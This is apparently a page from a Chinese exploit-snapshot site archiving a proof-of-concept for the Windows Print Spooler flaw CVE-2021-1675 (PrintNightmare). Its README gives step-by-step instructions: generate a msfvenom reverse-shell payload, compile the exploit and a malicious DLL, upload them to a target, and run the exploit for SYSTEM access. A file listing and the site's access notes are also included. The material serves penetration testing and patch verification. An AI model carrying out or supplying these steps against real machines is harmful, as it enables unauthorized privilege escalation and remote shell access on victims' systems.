关联漏洞
标题:
Microsoft Windows Print Spooler Components 安全漏洞
(CVE-2021-1675)
描述:Microsoft Windows Print Spooler Components是美国微软(Microsoft)公司的一个打印后台处理程序组件。 Microsoft Windows Print Spooler Components存在安全漏洞。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for AR
描述
PrintNightmare Local Privilege Escalation
介绍
# PrintNightmare Local Privilege Escalation PoC
src/nightmare.cpp: source code to exploit CVE-2021-1675 and gain system access
by installing a malicious dll
src/payload-dll.cpp: source code for dll with malicious shellcode in entry function
**!!Only use against servers on which you have permission to test**
## Summary
CVE-2021-1675 is a vulnerability in the Print Spooler Service of Microsoft Windows
which allows an attacker to bypass the SeLoadDriverPrivilege check. This can be
leveraged to gain privilege escalation on the target machine by installing a
malicious DLL which calls shellcode or uses the Window API to establish a reverse
shell connection. Versions of Windows 10/8/Server 2008/Server 2012 before June
8th, 2021 are affected.
## POC
1. Download or clone git repo
2. Use msfvenom to generate a suitable payload in c
`$ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f c`
3. Paste the output of msfvenom into payload-dll.cpp where it says to 'change me'
4. Compile the main executable
`x86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp`
`x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspool`
5. Compile the dll
`x86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -shared`
6. Archive the exe and dll, then find a way to upload the archive to your target machine
`zip ./bin/PrinterNightmareLPE.exe ./lib/ `
7. Once the archive is on the target Windows machine, extract it
8. Move evil.dll to c:\windows\temp\evil.dll
9. Run the PrintNightmareLPE.exe
## Notes
* If everything is working properly the exploit should iterate through the Windows' printer drivers and print out the results
* You can change the filepath PrintNightmareLPE.exe loads the evil.dll from inside the source code
* currently the malicous dll just loads calc.exe as Proof-of-Concept
文件快照
[4.0K] /data/pocs/3336423e9a7099b4c5cc970b8f115237a5c2350a
├── [4.0K] bin
│ └── [2.3M] PrintNightmareLPE.exe
├── [4.0K] lib
│ └── [ 91K] evil.dll
├── [2.0K] README.md
└── [4.0K] src
├── [4.9K] nightmare.cpp
├── [ 25K] nightmare.o
├── [1.6K] payload-dll.cpp
└── [ 571] template-offensive-dll.cpp
3 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。